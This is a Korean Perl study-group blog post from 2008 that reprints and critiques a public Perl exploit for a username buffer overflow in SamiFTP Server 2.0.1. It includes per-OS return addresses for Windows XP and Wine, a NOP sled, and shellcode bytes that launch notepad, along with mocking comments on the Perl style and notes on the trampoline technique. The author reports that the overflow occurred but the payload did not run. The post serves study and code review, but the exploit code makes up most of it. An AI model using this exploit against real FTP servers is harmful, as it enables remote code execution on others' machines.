Naver Perl Community & Study Cafe


2008.10.06 18:06

Underground Perl #1 - 4

-[0x03] # Critical Security Critically Sucks -----------------
# 이번에는... Critical Security 를 한번 까본다.
# Author :  Critical Security
# http://www.critical.lt/
# 저자 : http://www.milw0rm.com/author/547
# 원문 : http://www.milw0rm.com/exploits/1448
# 이탈리아 보안 팀이며 이 문서는 sami ftp 서버의 취약점을
# 분석하여 exploit을 작성하였다.

# SamiFTPServer 취약점인 2.0.1 버전대의 프로그램을 구하여 일단 실험


# 설치성공 후 실행 화면


# ftp 프로그램으로 접속을 해봤더니 잘 되는것을 확인 할 수 있다.



# user id를 입력을 할때 오버플로우가 일어나는데 이것을 이용하여 
# exploit 코드를 작성하였다.



use Net::FTP;                 
use Switch; 
# Switch sucks
#스위치를 쓰는것에 대해서 sucks;
if (@ARGV < 3) { print "--------------------------------------------------------------------\n"; print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumber\n"; print " Offsets: \n"; print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call esp\n"; print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call esp\n"; print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp esp\n"; print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6 kernel32.dll jmp esp\n"; print " If values not specified, default values will be used.\n"; print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1\n"; print "--------------------------------------------------------------------\n"; } $host = "127.0.0.1"; $yourip = "127.0.0.1" ; # how about: my ($host, $yourip) = '127.0.0.1';
# 같은 값을 선언을 할때는 list로 묶어준다.
 
$offset = "\xE0\x3A\xB4\x76"; 

foreach (@ARGV) { 
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/);
$offset = $1 if ($_=~/-o(.*)/);
}
# Do I need to get into how much you suck at regex? 
# Way to overuse parens and .* and $_
# my ($host) = $_ =~ /(-h\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/;
# might as name that loop val since you'll use it

# 정규식을 제대로 쓰지 않았다.
# 일단 IP는 숫자임으로 임의의 문자인 . 이 아니라 숫자인 \d 그리고 
# {1,3}까지의 반복이 정확한 표현이다.
switch ($offset) {
case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp
case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp
case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp
case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
}

# 코드를 간단히 설명하자면 운영체제마다 offset을 따로 설정하여
# xp sp0~2 그리고 FreeBSD 까지 exploit이 되도록 설정하였다.
# FTP 서버에 올라오는 모듈 중 winmm.dll 의 call esp 코드 사용


# Trempolin Technique

# 쉘코드의 정확한 위치를 알지 못하기 때문에

# 메모리 주소가 항상 일정한 dll코드를 사용한다.

foreach $letter (split '', $yourip) { $c++;}; # never heard of length()

# length함수를 쓰면 간단히 해결 가능
# $c = length($yourip);

$ftp = Net::FTP->new($host, Debug => 0)  or die "Cannot connect: $@";
$user = "A" x 213 . # You could give kokanin some lessons
"A" x (15 - $c)   . 
$offset .           
# ret adresas a kokio dll'o call esp  ar jmp esp, ar ka nors panaðaus svarbu, 
kad nuðoktume a esp ;)
"\x90" x 25 .       # nop'ø sled'as, kad sulygintume su esp esaneiu adresu

# ðelkodas paleidþiantis notepad?  
(ðelkodas skirtas tiem kas sake, jog critical megsta DoS :*) - noresit, asidesit normalø..
"\xCD\x03".
"\xEB\x61\x56\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C".
"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\xC3\x60\x8B\x6C".
"\x24\x24\x8B\x45\x3C\x8B\x54\x05\x78\x01\xEA\x8B".
"\x4A\x18\x8B\x5A\x20\x01\xEB\xE3\x34\x49\x8B\x34".
"\x8B\x01\xEE\x31\xFF\x31\xC0\xFC\xAC\x84\xC0\x74".
"\x07\xC1\xCF\x0D\x01\xC7\xEB\xF4\x3B\x7C\x24\x28".
"\x75\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B".
"\x5A\x1C\x01\xEB\x8B\x04\x8B\x01\xE8\x89\x44\x24".
"\x1C\x61\xC3\xE8\x9A\xFF\xFF\xFF\x68\x98\xFE\x8A".
"\x0E\x50\xE8\xA2\xFF\xFF\xFF\xEB\x02\xEB\x05\xE8".
"\xF9\xFF\xFF\xFF\x5B\x83\xC3\x1C\x33\xC9\x88\x0B".
"\x83\xEB\x0B\x41\x51\x53\xFF\xD0\x90\x6E\x6F\x74".
"\x65\x70\x61\x64\x2E\x65\x78\x65\x01";
$ftp->login("$user","biatch"); 
# bah, just when I thought you knew not to quote vars
# 모두들 쿼터를 너무 좋아하는듯..

# 일단 오버플로우 되는것은 확인하였으나 exploit 코드가 실행되지는 않았다.
# 뭔가 문제가 있는듯.. 전체적인 코드는 일단 확인했으니
# 시간날 때 직접 exploit코드를 작성해보도록 하자.
신고
Trackback 0 Comment 0